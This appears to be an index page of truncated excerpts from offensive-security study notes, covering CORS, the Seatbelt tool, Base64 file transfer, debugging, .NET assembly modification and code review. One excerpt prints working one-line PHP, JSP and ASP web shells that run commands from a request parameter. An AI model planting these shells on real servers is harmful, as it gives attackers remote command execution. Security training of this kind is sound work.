Same-Origin Policy and CORS There are three key concepts to understand CORS: Origins and the Same-Origin Policy (SOP) Cross-Origin Resource Sharing (CORS) Sending Requests Between Origins ...

SEATBELT Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives. You can download from he...

Base64 Upload/Download In some cases, we may not be able to transfer the file. For example, the remote host may have firewall protections that prevent us from downloading a file from our machine. ...

PHP WEBSHELL <?php system($_REQUEST["cmd"]); ?> JSP WEBSHELL <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ASP WEBSHELL <% eval request("cmd") %>

String Example: $app->post('upload-avatar', function (Request $request, Response $response, array $args) use ($container) { Useful for Notepad++ Keeps only the string $app->post('upload-a...

Remote Debugging Remote debugging allows us to debug a process running on a different system as long as we have access to the source code and the debugger port on the remote system. Let’s try...

Installation OPTION #1 The easiest way to install Visual Studio Code for Debian/Ubuntu based distributions is to download and install the .deb package (64-bit), either through the graphical softwa...

Assemblies Modification We can arbitrarily modify assemblies, by using this technique to add debugging statements to a log file or alter an assembly’s attributes in order to better debug our targe...

Debugging One of the best ways to understand an application is to run it through a debugger, which allows us to inspect application memory and call stacks. This information can be invaluable when ...

As is always the case when we have access to the source code, we first like to just look around and get a feel for the application. How is it organized? Can we identify any coding style that can he...